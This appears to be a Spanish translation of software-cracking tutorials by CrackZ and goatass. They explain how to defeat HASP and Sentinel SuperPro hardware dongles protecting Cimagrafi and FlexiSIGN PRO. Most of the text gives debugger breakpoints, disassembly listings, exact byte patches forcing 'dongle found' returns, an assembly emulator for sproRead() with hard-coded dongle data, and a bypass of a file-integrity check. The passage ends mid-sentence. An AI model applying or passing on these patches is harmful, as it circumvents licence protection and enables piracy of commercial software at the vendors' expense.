6. Carga tu programa, bpx para la referencia 'emp bh, 32", rastra y figurate, edita la dll para tus necesidades. 
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Programa: Cimagrafi v5.0 

PROTECCION: Mochila HASP 

Objetivo: Eliminar las entradas de las mochilas. 

Descripcion: Buscar en la WEB la utilidad de este soft. 

Dificultad: Media. 

DOWNLOAD : http: //www.graphitech.net/ 

Herramientas: Softice W32dasm, IDA, HIEW 

CRACKER: CrackZ FECHA: 0 O 
INTRODUCCION 


Bienvenidos nuevamente a un tutorial sobre dongles, esta vez estaremos trabajando con HASP (de la empresa 
Aladdin Knowledge Systems). HASP, es vista por la mayoría de los crackers, como una de las mas difíciles 
dongles, al menos por supuesto, que tengas acceso al dongle original. Entonces comparando las respuestas es 
obviamente fácil. HASPs, vienen en varios sabores, yo los categorice en dos grupos, las que devuelven código 
de retorno, y las que usan un reloj interno. 


Gran cantidad de información sobre las APIs de HASP esta disponible en: ftp://ftp.hasp.com/, si estas 
realmente interesado en el dongle, baja el CD de documentación entero, sino baja alguno de los PDFs. Cuando 
estas trabajando con HASP, conocer el modelo especifico ayuda mucho. Cuando estés desensamblando, usa el 
IDA. Las implementaciones de HSAP varían, pero no te preocupes si encontrás que usando un bpio -h 378 rw 
no funciona. En la mayoría de los casos hay que olvidarse de trabajar con los NAG Box, (mas tarde voy a 
explicar algunas de las características usadas en HASP acerca de Nag Box). 


Con el dongle de Sentinel, no instalar el drivers puede ser una ventaja, sin embargo es lo contrario para 
HASP, (instalá el driver vxd ahora y mas tarde los removemos). 


AL ATAKE 


Voy a comenzar el trabajo; hay cuatro archivos Exe en total, pero por ahora me voy a enfocar solamente en 
graficad.exe, la teoría que aplicamos aquí es que una vez que crackeamos uno los demás son los mismo. Ejecutando el 
programa, se produce el siguiente mensaje "PLUG NOT FOUND", que es creado usando la famosa MessageBoxA, 
solamente anotamos la dirección, y nos olvidamos de buscar el salto para evitarlo, de esta manera nunca lo lograras. 


Poner un bpio -h 378 rw no hace nada, de manera que usamos bpx CreateFileA, esto es porque asumimos que el 
programa necesita abrir el driver vxd/dongle para comenzar a comunicarse. Permití que se ejecuten varios break hasta 
que aparece el MessageBox, y anota la dirección de el ultimo lugar que interceptaste. Que tiene que ser parecido al 
siguiente código. 


:004AB91C CALL [KERNEL32!CreateFileA] <-- 20 breaks aqui. 


Una ves que estamos en este lugar, deshabilitamos el brekpoint, y comenzamos a tracear con F10. Usa F12 hasta ir al 
entry point en 004A99DE, una mas y aparece el MessageBox. 


:004A99DE MOV EAX, [EBP-4] 

:004A99E1 MOV [EAX+12h], BL <-- Puede ser una bandera interesante, consultar las referencias en las APls. 
:004A99E4 CALL SUB_402A58 <-- Función Xx. 

:004A99E9 MOV EAX, OFFh 

:004A99EE CALL SUB_402D08 <-- Función y, (El valor que retorna EAX es interesante). 
:004A99F3 MOV EDX, [EBP-4] <-- Puede ser peor 'watching' EBP-4. 

:004A99F6 MOV [EDX+11h], AL <-- Almacena AL. 

:004A99F9 CMP ds:dword_50C7FC,0 <-- 19 respuesta del dongle. 

:004A9A00 JNZ 004A9A29 <-- Este lugar tiene que ser chequeado. 

:004A9A02 CMP ds:dword_50C800,0 <-- 20 respuesta del dongle. 

:004A9A09 JNZ 004A9A29 <-- Nuevamente. 

:004A9A0B CMP ds:dword_50C804,0 <-- 30 respuesta del dongle. 

:004A9A12 JNZ 004A9A29 <-- El chequeo final. 


Cuando te pones a pensar acerca de códigos como el de arriba, es malo ponerse a ponerle nombre a cada función y 
especular acerca de que hace cada línea. El JNZ 004A9A29 es evidentemente critico para el flujo del programa, cuando 
lo tracees, te encontraras dword puestos en cero, poco después aparece un call que presenta "PLUG NOT FOUND", de 
manera que alguno de los saltos condicionales hace que esto suceda. La pregunta es: Cual es la manera mas fácil para 
resolver esto? 


:004A9A29 MOV EAX, ds:dword_50C800 <-- Es este dword. 

:004A9A2E DEC EAX <-- resta 1. 

:004A9A2F SUB EAX, 2 <-- resta otros 2. 

:004A9A32 JB 004A9A38 <-- "ILLEGAL PLUG" tambien en esta parte. 

:004A9A34 JZ 004A9A55 <-- "ILLEGAL PLUG" aqui tambien, pero es el salto bueno. 
:004A9A36 JMP 004A9A72 <-- "PLUG NOT FOUND" Inevitable ecepcion. 


Para realmente entender esto, necesitas tener bien claro la siguiente sección de código. Saltando por JB o JZ, la 
ejecución del código continua por el JMP 004A9A8B, aunque un llamado de función presenta "ILLEGAL PLUG" antes que 
podamos continuar. 


Tené en cuenta los valores que corresponden a las tres banderas (Flag), que tienen que ver con JB y JZ. [EAX+10h] - 
es puesto en 1 o 0, [EAX+8] es puesto en 32h o 4Dh, y [EAX+0Ch] en 33h o 4Ch. El JZ es el salto "bueno", porque? 
bueno, porque ningún programador serio se molestaría con un salto preciso como es JZ (por ejemplo dword_50C800 = 
3), si un simple JB fuera suficiente, también esta conclusión se refuerza por el hecho que [EAX+10h] es puesto a 1 
(verdadero). 


Bueno ahora haremos un emparchado preliminar aquí, usaremos el espacio de direcciones de todas estas 
comparaciones y el JNZ a 004A9A29 para poner MOV dword_50C800, 3. y después ponemos la comparación, y el salto 
si no es cero, en realidad se puede hacer un salto directo porque la bandera no se cambia en ningún lado mas. Si tenes 
ganas podes bajar al final del tutorial, los GIF donde muestro en el Hiew, como hacer esto. 


Ahora cuando corremos graficad.exe este nos presenta "ILLEGAL PLUG" este mensaje aparece en la función CALL 
SUB_4A9FC4, que es donde empezaremos a trabajar. Tené en cuenta que si usas W32Dasm, la primera parte de la 
función no es desensamblada correctamente. Por favor no te olvides de buscar cualquier instancia de dword_50C800. 


:004A9C2A CALL SUB_4AA3B8 <-- Lee el dongle nuevamente (talvez). 
:004A9C2F CMP ds:dword_50C800, O <-- Check. 
:004A9C36 JNZ 004A9C4D <-- No necesito decir que hace este salto. 


En esta instancia no vamos a poder hacer un parche tan elegante como el anterior, debido a las restricciones de 


direcciones, aunque posiblemente podríamos usar el espacio de memoria entre 004A9C38 y 004A9C42. Volvemos al 
SICE, y tracemos entre las inmediaciones de 004A9FC4, la primera sección de este llamado setea 11 WORD, de una 
manera horrendamente ineficiente. (Codifique esto nuevamente con muchos menos bytes), desde EBX, 0, hasta el 
primer salto a JNZ 004AA01D. El traceo de esta sección tiene que ser hecha prestando mucha atención. 


:004AA04B PUSH offset dword_50C7FC 

:004AA050 PUSH offset dword_50C800 <-- Reconoces esto. 

:004AA055 PUSH offset dword_50C804 <-- Esto sera checkeado. 
:004AAO5A PUSH offset dword_50C808 <-- Esto es datos del dongle. 
:004AA070 CALL SUB_4AA3B8 <-- Ahora conocemos aqui lee el dongle. 
:004AA075 CMP WORD PTR [EBX], 192h <-- La comparación inevitable. 
:004AAO7A JZ 004AA094 <-- Jump_nice_dongle_return. 


Lentamente hemos ido quebrando esta protección. Cuando anteriormente hicimos la búsqueda por lugares que 
chequearan el dword_50C800, Yo especule que la función SUB_4AA3B8 podía ser la función de lectura del dongle, y el 
código de aquí confirma la sospecha. Tenemos que hacer dos cosas mas, primero emparchar en la forma correcta el 
código de aquí, y segundo buscar por otras apariciones de la función SUB_4AA3B8. Cuando emparchaba esta sección 
usaba desvergonzadamente el espacio de direcciones para asegurarme que la bandera cero fuera seteada por la 
comparación. 


Después de hacer esto continuamos inspeccionando el código un poco mas. Otro chequeo aparece en este código. 


:004AA094 CMP ds:dword_50C804, O <-- Check dongle data por 0. 
:004AA09B JZ 004AA0B5 <-- Good_jump (salto bueno). 


Después de empachar esto, retornamos uno o dos pasos atrás y buscamos por SUB_4AA3B8, encontraremos que 
aparece nuevamente en este código (no creo que sea necesario corregirlo) 


:004A9EAB CALL SUB_4AA3B8 <-- Lectura del Dongle. 
:004A9EAO TEST BL,BL <-- Test BL=0. 
:004A9EA2 JZ 004A9EAB <-- No hay que saltar aqui (bad_Jump) 


Ahora corremos graficad.exe y igual tenemos el menssage box "ILLEGAL PLUG", después de mucho pensar encontré 
finalmente donde emparcharlo. Conocemos que la función SUB_4AA3B8 lee el dongle, y en términos del flujo de 
ejecución el ultimo chequeo que se hace es el del arriba. Usamos el Symbol Loader y llegamos a la dirección 0OO04A9EAO 
poniendo un comando g temporizado. El JZ funciona como deseamos no necesitamos emparcharlo, (posiblemente 
porque en cada API de la HASP, BL solamente retorna O si un por LPT no fue encontrado), la función SUB_4A9DA4 
siguiente es la que tenemos que investigar. 


:004A9DAF TEST EDX,EDX 

:004A9DB1 JNZ 004A9DD3 <-- Dirección del Good_jump. 
:004A9DB3 TEST ECX,ECX 

:004A9DB5 JNZ 004A9DD3 <-- Dirección del Good_jump. 
:004A9DB7 TEST EAX,EAX <-- Pregunta si es cero. 

:004A9DB9 JNZ 004A9DD3 <-- El mejor Good_jump para forzar. 
:004A9DC9 CALL SUB_4A96D4 <-- Si no es cero llama esta función. 


Este código se explica por si solo, cualquiera de los JNZ tendrá que ser forzado. Sugiero el ultimo por la razon de que 
antes de hacer este chequeo el valor del registro EAX es seteado por (DWORD PTR [EBP+14]), y además este es de 
propósito general, contrario a los registros ECX/EDX, que pueden retener sus valores muy profundo en el proceso de 
chequeo. Esto concluye con el truco de la sección de ingeniería inversa. Los otros tres archivos son similares, por lo 
tanto aplica la misma técnica. 


Apartado sobre tablas de salto - HASP DWORD 


Siempre que ataques un HASP, desensamblalo y examiná con cuidado por string de NAGs, y asegurate de tener 
presente la tabla de salto de DWORD, la cual he visto en la mayoría de los HASP que he atacado hasta aqui. En la 
mayoría de los programas que tengan HASP necesitaras emparcharlo en mas de un lugar, y el primer paso será 
probablemente cambiar el string NAG "Incorrect Plug" o algún mensaje similar. 


:04A9713 ADD ESI,03 <-- ESI usado como variable se salto. 

:004A9716 CMP ESI,OE <-- Maximo numero de posibilidades. 

:004A9719 JA 004A97E7 <-- Quick Exit. 

:004A971F JMP DWORD PTR [4*ESI+offset] <-- Tabla de salto para string de errores. 


Resta por decir que cuando crackeas un HASP correctamente, llegas a este código. Como un ejercicio final para vos 


queda sacar los string de DEMO y EXP del EXE, solamente con fines estético. 


Traducción: AFTOSA 
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Programa: 


Karpoff Spanish Tutor 
FlexiSIGN PRO and it's family of products 


PROTECCION: SuperPro de Sentinel 

Objetivo: Destrabar las API de funciones de la DLL SentinelSuperPro WIN32 

Descripcion: En la web esta la descripción 

Dificultad: Media 

DOWNLOAD: http: //www.amiable.com 

Herramientas: Softice W32dasm IDA Editor Hexadecimal 

CRACKER: Goatass, CrackZ FECHA: E NO ACTA 
INTRODUCCION 


"Después de leer el muy buen tutorial de goatass, me senté y me puse a tomar una cerveza bien fría, 
mientras pensaba: ¿porque los desarrolladores de software delegan su estrategia de protección a los 
vendedores de dongles? Eso es realmente frustrante. Echale una mirada a mi sitio, y llegarás a la conclusión 
de que los dongles son un gasto al pedo de dinero. Yo me pregunto: ¿algún usuario de dongles no ha pensado 
alguna vez en iniciarles acciones legales a estos comerciantes metirosos? Hay un buen caso con los dongles 
que no cumplen con el propósito para el que fueron creados". "Cuando reescribas la función sproRead() 
acordáte que el código que uso en el ejemplo de emulación inicialmente depende del stack, (para obtener la 
dirección de lectura), goatass apuntó algunos problemas haciendo esto, probablemente debido a las 
características del compilador, sproRead() no siempre preserva el valor del registro, EBX como te darás cuenta 
en este artículo. Por supuesto que si tenés acceso a mi página privada, aprenderás que hay una manera de 
emular todas las rutinas de Sentinel en un solo lugar, goatass incluso muestra algunos de los códigos claves 
para hacer esto :-) él dice que la palabra (word) OA copiada a la estructura de grabación + 30h luce 
sospechosa". "Tutorial ligeramente editado por CrackZ". 


Segunda Introduccion: 


Primero que nada, quiero decir que compré este soft, y que tengo el dongle y la licencia original de FlexiSIGN 
PRO. Amiable es una empresa que hace soft de alta calidad para la industria de Letreros o carteles. Un tutorial 
escrito por CrackZ hace tiempo, sobre el CASMate, fue el primer paper sobre protección usado por esta 
compañía. Yo también crackeé, de la misma empresa, el Inspire 1.6 pero no tuve el tiempo suficiente para 


escribir un tutorial. De cualquier manera, esta aplicación usa la mochila SuperPro de Sentinel, en conjunto con 
un nombre de usuario y una password que deciden cuál programa estás autorizado a instalar. En este tutorial 
te mostraré cómo encontrar y emular la mochila de Sentinel, y cómo bypass todos los checks que estén 
relacionados. 


Herramientas 


http://zencrack2.cjb.net/ - Todos los tuturiales sobre Sentinel tutorials (y mucho más). 
fto://ftp.rainbow.com/pub/online_documents/ - No olvidarse de leer pro223.pdf, spro_dev.padf. 
SoftICE, Hex Editor, IDA or W32Das 


AL ATAKE 
En marcha! 


OK, después de instalar el programa chusmeamos los archivos. Corremos el archivo App.exe que es el programa 
principal, App2.exe es el administrador de producto (nos ocuparemos de él más tarde). ¿Qué ves? Carga algunas 
"cagaditas", y después tira un mensaje de error diciendo: 


"This application requires that a Hardware key be installed, but none was found”. 


Este lindo mensaje nos anuncia que el programa busca en nuestros ports para ver si hay una mochila conectada, y por 
supuesto no la encuentra. Habiendo leído el manual de Sentinel sabemos que el programa debe llamar la función 
sproFindFirstUnit() después de haber inicializado el "record paquet" con la función sprolnitialize(). Cuando nos 
referimos a "record paquet", queremos decir una estructura que retiene y retendrá información sobre la mochila 
(dongle). Nuevamente usando info del manual de sentinel, sabemos que esta estructura debe ser puesta en el stack, 
antes de que cualquier API de la mochila sea usada. Esto es bueno para nosotros porque nos dá una marca de partida, 
para encontrar todos los llamados de API de la mochila. 


También sabemos que cuando una API falla retorna 3 en el registro EAX. Otra cosa que nos ayuda es la demora que 
genera la mochila cuando el programa trata de accederla y no la encuentra, ésta hará como si la PC se colgara por unos 
pocos segundos; cuando esto sucede, es una señal inequívoca que se hizo un CALL a una API de la mochila. Antes de 
que este call suceda, el programa debe chequear que tenga una packet record válido, y es además lo que usaremos 
para encontrar el llamado a la mochila. En el código del programa luce más o menos así: 


CMP WORD PTR [ESI], 7242 
JE packet_record_valid 
MOV AX, 0002 

POP EDI 

POP ESI 

RET 000C 


7242 es la firma del packet record, y debe ser chequeada; si falla el código que retorna en EAX es 2, que significa 
paquete incorrecto (Invalid Packet). Bien, basta de teoría por ahora, y vamos directo a nuestro negocio. Después de 
observar cuáles archivos son llamados por programa, los abrimos con el W32Dasm,y nos fijamos qué funciones importa 
y exporta. Comenzamos con un archivo llamado Sx32w.dll. Después de abrirlo chusmeamos que en el listado de 
exportación, exporta todas las funciones que vimos en el manual de Sentinel. Interesante ¿no?, si lo abrimos con un 
editor hexadecimal casi al final del archivo encontramos el string "SentinelSuperPro WIN32 DLL", que es la DLL que 
provee Rainbow a los desarrolladores para usarla en su aplicación. Esto es realmente bueno para nosotros, porque 
ahora conocemos el lugar principal donde se hacen los llamados a la mochila; y además cuando el soft necesite usar la 
mochila se debe usar ésta DLL. 


Nuestro siguiente paso será poner este achivo en el debuger (SICE) y hacer todas las modificaciones a la mochila en un 
solo lugar. La clave para crackear un programa protegido con una mochila es tracear diferentes path hasta que 
encontrás el correcto. Bien, la gran pregunta es: ¿Cómo hacemos para poner un break en una mochila? Lo que hice, 
debido a que las APIs son llamadas de un montón de DLLs, fué abrir Sx32w.dll y fijarme el offset de la función 
sproFindFirstUnit(); después lo abrí con el editor hexadecimal, ubiqué el cursor en el offset y reemplacé el primer byte 
con CCh que es la INT 3; hay que acordarse del valor que tenía, de manera que eventualmente podamos restituirlo. 


En el SICE poné BPINT 3 (breakpoint en la INT3) y salí de la ventana presionando (F5). Ahora corré el programa y 
esperá el break, para editar el byte que apunta el puntero de instrucción, poné E EIP, entonces cambiá CCh al valor 
original. Siguiendo con el SICE, pone el siguiente brekpoint "bpx EIP". Ahora anda al editor hexadecimal abrí el 
ejecutable y restaurá el valor CCh a al que tenía originalmente. Salí del editor y nuevamente corré App.exe. Como era 
de esperar, tenemos un break en la función sproFindFirstUnit(). Cuando esto ocurre luce de la siguiente forma: 


Exported fn(): RNBOsproFindFirstUnit - Ord:000Bh 

:004072B0 PUSH EBX 

:004072B1 PUSH ESI 

:004072B2 MOV EAX, DWORD PTR [ESP+0C] 

:004072B6 OR EAX, EAX <-- verifica que el programa hay PUSHesdo el packet record. 
:004072B8 JNE 004072C3 

:004072BA MOV AX, 2 

:004072BE POP ESI 

:004072BF POP EBX 

:004072C0 RET 8 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


|:004072B8(C) 


:004072C3 PUSH EAX 

:004072C4 CALL 004010DO 

:004072C9 MOV ESI, EAX 

:004072CB CMP WORD PTR [ESI], 7242 <-- this is the trademark check for the 
:004072DO JE 004072E0 <-- validity of the packet record. 

:004072D2 MOV AX, 2 

:004072D6 POP ESI 

:004072D7 POP EBX 

:004072D8 RET 8 


El código que sigue es el llamado a la mochila. No hay que preocuparse mucho por esto, porque en este punto el dongle 
no genera código de retorno, sino solamente dos valores en el registro EAX: 3 si no está presente, y cero si está 
presente. Lo que hacemos para emparcharlo, es poner NOP en donde estaba el JNE en la dirección 004072B8, y 
cambiamos MOV AX, 2 a MOV AX, O como se ve abajo: 


:004072B8 90 NOP <-- evita el JNE. 
:004072B9 90 NOP 
:004072BA 66B80000 MOV AX, O <-- fuerza a retornar O - Encontro dongle. 


Eso es todo lo que hay que hacer para emparachar el primer chequeo de la mochila. Bastante simple, ¿no?. Bueno, no 
nos pongamos tan contentos que resta mucho por hacer. Antes de que comencemos a realizar el trabajo de 
emparchado usando el editor Hexadecimal, (supongo que saben cómo hacerlo), vamos a continuar con el siguiente 
llamado que se hace a la mochila, que debería ser sproRead(). Aquí es donde tenemos que hacer la mayoría del 
trabajo para reventar la protección, tampoco quiero que crean que es tan difícil. Comenzamos usando la técnica que 
expliqué anteriormente de BPINT 3 en la función sproFindFirstUnit(). Una vez realizada la tarea en el SICE, y cuando el 
break se ejecuta luce de la siguiente forma: 


Exported fn(): RNBOsproRead - Ord:0002h 
:00407480 PUSH ESI 

:00407481 PUSH EDI 

:00407482 MOV EAX, DWORD PTR [ESP+0C] 
:00407486 OR EAX, EAX 

:00407488 JNE 00407493 

:0040748A MOV AX, 2 

:0040748E POP EDI 

:0040748F POP ESI 

:00407490 RET 0C 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00407488(C) 


:00407493 PUSH EAX 

:00407494 CALL 004010DO 

:00407499 MOV ESI, EAX 

:0040749B CMP WORD PTR [ESI], 7242 <-- Verifica trademark nuevamente. 
:004074A0 JE 004074B0 

:004074A2 MOV AX, 2 

:004074A6 POP EDI 

:004074A7 POP ESI 

:004074A8 RET 0C 


:004074C5 MOV EDI, DWORD PTR [ESP+14] <-- EDI tiene la direccion del buffer para almacenar los datos. 
:004074C9 OR EDI, EDI <-- La word retornada de la mochila. 


:004074E0 MOV [ESI+30], OOOA 

:004074E6 MOV AX, WORD PTR [ESP+10] 

:004074EB MOV WORD PTR [ESI+34], AX 

:004074EF PUSH ESI 

:004074FO CALL 00405E10 <-- Este call lleva a la funcion sproRead()!, que nosotros emularemost. 
:004074F5 OR AL, AL <-- is AL =0?. 

:004074F7 JNE 00407510 <-- Si no da, chau vieja . 

:004074F9 MOV AX, WORD PTR [ESI+36] <-- WORD que retorna la mochila. 

:004074FD MOV WORD PTR [EDI], AX <-- pone esa WORD en el buffer. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0040751E(C) 


:00407500 MOV AX, WORD PTR [ESI+06] <-- Direccion de codigo de error. 

:00407504 PUSH EAX 

:00407505 CALL 00406AC0 <-- Verifica el codigo de error code, debe retornar O en el registro EAX para indicar OK. 
:0040750A POP EDI 

:0040750B POP ESI 

:0040750C RET 0C 


El código que está abajo lo origina cm32.dll que es la DLL encargada de la protección. Se comunica con la mochila y 
resuelve los valores que ésta retorna. Abajo hay una explicación sobre esto: 


:10002F60 CMP DWORD PTR [EBP-04], 17 <-- Verifica si llegamos a CELL 17. 
:10002F64 JGE 10002FBO 

:10002F66 MOV ECX, DWORD PTR [EBP-04] <-- Numero de CELL actual. 
:10002F69 MOV EDX, DWORD PTR [EBP+0C] <-- Bueffer de retorno. 
:10002F6C LEA EAX, DWORD PTR [EDX+2*ECX] <-- Hace espacio para la proxima WORD. 
:10002F6F PUSH EAX 

:10002F70 MOV ECX, DWORD PTR [EBP-04] <-- CELL a leer. 

:10002F73 ADD ECX, 8 <-- Salta las CELLs 1 a 7. 

:10002F76 PUSH ECX 

:10002F77 MOV EDX, DWORD PTR [EBP+08] <-- packet record. 

:10002F7A PUSH EDX 


* Reference To: SX32W.RNBOsproRead, Ord:0001h 


:10002F7B CALL 100281C7 <-- call sproRead(). 

:10002F80 AND EAX, OOOOFFFF <-- Refina el codigo de error. 
:10002F85 MOV DWORD PTR [EBP-08], EAX 

:10002F88 CMP DWORD PTR [EBP-08], O <-- Fue correcta la lectura?. 
:10002F8C JE 10002FAE <-- Buen cracker. 

:10002F8E CMP DWORD PTR [EBP-08], 7 

:10002F92 JNE 10002FAO 

:10002F94 MOV EAX, DWORD PTR [EBP-0C] 

:10002F97 MOV [EAX+04], 8 

:10002F9E JMP 10002FAA 


El código está en un lazo desde CELL 8 a CELL 17 (en hexadecimal). Después que tenemos toda la data de la mochila 
almacenada en la memoria, continuamos. El código de abajo es la función que llama el enredo de arriba: 


:100029A5 CALL 10002F45 <-- Llamado por el loop de arriva (sproRead() loop). 
:100029AA TEST EAX, EAX <-- El valor de retorno del CALL debe ser 1. 
:100029AC JNE 100029B2 <-- good jump. 

:100029AE XOR EAX, EAX 

:100029B0 JMP 100029FA 


:100029B2 MOV ECX, DWORD PTR [EBP-38] <-- Adquiere una de las WORDs retornadas por la mochila. 
:100029B5 MOV EDX, DWORD PTR [EBP-2C] 

:100029B8 MOV DWORD PTR [ECX+428], EDX 

:100029BE MOV EAX, DWORD PTR [EBP-38] <-- buffer a la data retornada de la mochila. 

:100029C1 MOV ECX, DWORD PTR [EAX+428] 

:100029C7 CMP ECX, DWORD PTR [EBP+0C] <-- compara el USER NUMBER del programa con el que retorna la 
mochila. 


:100029CA JNE 100029D3 
:100029CC MOV EAX, 1 <-- good flag. 
:100029D1 JMP 100029FA 


En este tramo ya tenemos en ECX el valor retornado por la mochila para USER NUMBER, y en [EBP+0C] tenemos el 
valor correcto. Es el que entramos cuando instalamos el programa. Bueno, con solamente tipear en el SICE, D 
[EBP+0C], podemos ver el valor de retorno. Lo anotamos en algún lado, como también su posición desde la primera 
palabra (WORD ) desde la mochila. Después que salimos de este CALL, tenemos que chequear para ver si todo esto 
funciona correctamente: 


:10002428 CALL 10002974 <-- the call we just came back from. 

:1000242D TEST EAX, EAX <-- EAX debe ser igual a 1. 

:1000242F JE 100024DB <-- bad jump. 

:10002435 MOV [EBP-14], 00000000 <-- good flag. 

:10002491 MOV ECX, DWORD PTR [EBP-28] 

:10002494 CMP DWORD PTR [ECX+04], 8 <-- Verifica el valor de retorno del llamdo (CALL). 


:10002498 JNE 100024A3 <-- bad jump. 
:1000249A MOV [EBP-30], 1 <-- good flag. 
:100024A1 JMP 100024B2 <-- good jump. 


La verificacion de arriba, no es para chequear data de la mochila, es una verificación que hace el CALL para ver si no 
hubo problemas. Una vez que esta comparación es hecha, y el JMP 100024B2 es ejecutado, habremos hecho gran parte 
del emparchado. Bien, es tiempo de inspeccionar la función sproRead() para emularla. Cuando mirábamos la DLL 
Sx32w.dll,y llegábamos hasta la función sproRead(), veíamos que todo el chequeo que se hacía era para asegurarse de 
que el packet record había sido inicializado, y todo estaba bien antes de hacer la lectura de la mochila. La lectura 
comienza en la dirección 004074EO0 : 


:004074E0 MOV [ESI+30], 000A 

:004074E6 MOV AX, WORD PTR [ESP+10] 

:004074EB MOV WORD PTR [ESI+34], AX <-- "Developer ID" - (nota de CrackZ). 
:004074EF PUSH ESI 

:004074FO CALL 00405E10 <-- Hace la lectura real, no es interesante. 
:004074F5 OR AL, AL <-- AL debe ser O, se es 3 falla. 

:004074F7 JNE 00407510 <-- Salta si la lectura falla. 

:004074F9 MOV AX, WORD PTR [ESI+36] <-- retorna la WORD de la mochila. 
:004074FD MOV WORD PTR [EDI], AX <-- la salva en el buffer. 


:00407500 MOV AX, WORD PTR [ESI+06] <-- Nuevamente el codigo de error. 
:00407504 PUSH EAX 

:00407505 CALL 00406AC0 <-- funcion para limpiar el codigo de error. 
:0040750A POP EDI <-- Ahora EAX debe ser cero. 

:0040750B POP ESI 

:0040750C RET 0C 


El código anterior hace la lectura de la mochila y almacena el WORD retornado en el registro EDI ,entoces verifica 
nuevamente el código de error y lo pone en el registro EAX para la función que lo llamó. De manera que cuando se 
ejecuta el código de operación RET, (retorno de un llamado a función) el registro AX debe estar en cero. Mirando alguno 
de los tutoriales de CrackZ's sobre Sentinel, vemos que usa casi siempre la misma emulación para todas las 
aplicaciones que ha crackeado y que tengan Super SentinelPro. (Mira aquí here por el código) . Así que la tomé y la 
implementé como mi función sproRead(), pero le dí mucha difusión. Abajo está lo que hice: 


:004074E0 PUSH EBP <-- Salvamos EBP. 

:004074E1 CALL $+5 <-- Obtenemos el Delta Offset. 

:004074E6 POP EBP <-- Ponemos el Delta Offset en el registroEBP. 

:004074E7 LEA EDX, [EBP+4C1Ah] <-- Aqui es donde la data de la mochila esta en el archivo. 
:004074ED POP EBP <-- Corrige el stack nuevamente si no se cuelga. 

:004074EE SHL ECX, 1 <-- ECX retiene la WORD que estamos leyendo. 

:004074F0 MOVZX EAX, WORD PTR [ECX+EDX] <-- Lee la WORD desde la memoria simulada. 
:004074F4 MOV DX, 400h <-- Ponemos a manos un codigo de retorno bueno. 

:004074F8 MOV [ESI+6], DX 

:004074FC NOP 

:004074FD MOV [EDI], AX <-- Almacena el codigo de retorno en el registro EDI (buffer). 
:00407500 MOV AX, [ESI+6] 

:00407504 PUSH EAX 

:00407505 CALL sub_406AC0 <-- Limpia el codigo de error, EAX debe ser cero cuando salimos. 
:0040750A POP EDI 

:0040750B POP ESI 

:0040750C RETN OCh <-- returna a la funcion que llamadora. 


Puesto que el archivo que estamos poniendo en el emulador, en realidad es una DLL, puede ser cargado en diferentes 
páginas de memoria cada vez que el programa corre. Cuando corremos App.exe lo carga en 10000000, y cuando 
corremos App2.exe (administrador de producto) lo carga en 70000000. Por eso no podemos tener una dirección fija 
donde está la data de la mochila en el archivo. Para que me entiendas, hago esto: Tomo la data de la mochila y la 
pongo en el archivo justo después del último byte de la sección ".RELOC". Desde 004074E0 a 004074E6 obtenemos 
nuestro delta offset, que es el EIP + la dirección de carga de la DLL. De este modo no importa dónde es cargada la DLL, 
el CALL $+5 will siempre calculará nuestra posición correcta. 


A 4074E7 la tomo como mi posición actual y le sumo 4C1Ah, esto me deja justo en la primer palabra (WORD ) de la 
data de mi mochila simulada, que quedó fija en el archivo (hard coded). 


123A 223A 323A 423A 0000 0000 0000 0000 <-- Final de la seccion .RELOC. 

0000 0000 0000 0000 0000 0000 0000 0000 

0000 0000 0000 0000 0000 0000 0000 0000 

FFFF FFFF 0100 0200 0100 0000 O05E 1A00 <-- Comienza de la data de la mochila 


El segundo POP EBP es requerido aquí, porque de otra manera el stack se pone loco y se va todo al carajo. Cuando 
llegamos a SHL ECX, 1, (desplazar a la izquierda), tomá el número que viene como un parámetro a la función, (que le 
dice cuál número de la data de la mochila necesitamos leer), y lo multiplica por dos, (es lo mismo que desplazar un 
lugar), para obtener la palabra correcta, puesto que una palabra está compuesta por dos bytes. Después seguimos con 
MOVZX, lo que hace esta instrucción es la palabra (WORD) que está en la dirección que apunta la suma de 
[ECX+EDX], al registro EAX y completar con ceros la parte alta del registro. ECX es la palabra que necesitamos leer, y 
EDX es la dirección de la data de la mochila, sería como decir "quiero la primer palabra de la data que hay en la 
mochila". 


Después de esto, terminamos con el emulador; en la dirección 4074F4 ponemos en el código de retorno el valor 0400, 
después tomamos AX que contiene el WORD de la mochila que nos interesa, (obtenida un segundo atrás), y la 
ubicamos en el buffer que fue pusheado como parámetro a esta función. Ahora vamos al CALL at 407505 que pushea 
0400 y los limpiamos hasta retornar solamente el registro AL que tendrá 00. Si la función hubiera fallado el código de error, de retorno, sería 0403, 
y después de este CALL el registro AL tendría 03, que nosotros conocemos de la documentación, que significa "Key not 
found". 


Nosotros ahora tenemos totalmente emparchada (crackeada) la función sproRead(), que funcionará correctamente sin 
importar dónde se cargue la DLL. Pero nos queda la función sproQuery(), para ésta es más difícil hacer una "emulación" 
genérica, de modo que la traceamos con el SICE y estudiamos qué hace. Después de analizar nos damos cuenta que es 
realmente simple, de lo único que hay que asegurarse es que la función siempre retorne 00 en el registro AL ,y eso es 
todo. No hay chequeos de los valores retornados. cm32.dll es bastante parecida a PMCore.dIl que es la DLL principal 
para el administrador de producto, de manera que tenemos que hacer los mismos patches que le hicimos a la otra. 


OK, después de hacer todo esto corremos App.exe, pero ¿qué está pasando aquí? Todo el código que hemos cambiado 
en cm32.dll y PMCore.dll desapareció! OK, es probable que hayan implementado algún tipo de chequeo de la integridad 
de los archivos. Lo que hacemos es poner un BPX CreateFileA y corremos App.exe nuevamente, y cuando se produce el 
break presionamos F10 y tipeamos D *(ESP+08) para ver cuál archivo está siendo abierto. Se abren un montón de 
arhivos antes que lleguemos a ver cm32.dIl, presionamos F12 unas cuantas veces hasta que llegamos a Fscore.dll, 
ahora presionamos F10 algunas más hasta que obtenemos algo como esto :- 


MOV CL, [ESI] 
MOV DL, [EDI] 
CMP CL, DL 
JZ good 


No recuerdo exactamente el código, pero es más o menos así: Si hacés un D CL y D DL, en el SICE, te das cuenta que 
está comparando el archivo con una imagen que ha guardado en algún lado, de modo que solo hay que emparchar el 
JZ good a JMP y no cambiará tu archivo emparchado. Ahora corré App2.exe y hacé lo mismo para emparchar el 
chequeo que tiene en PMCore.dll. 


Corremos y está funcionando :)-. Ahora cuando hacés Rip e imprimís todo funciona bien, excepto que hay algo que 
fuerza a la impresora a imprimir lineas blancas sobre la imagen del texto. Bueno, desensamblamos PMCore.dll y 
buscamos alguna pista; vemos algo llamado IsDemoVersion(), lo que tenemos que hacer es que esta función retorne 
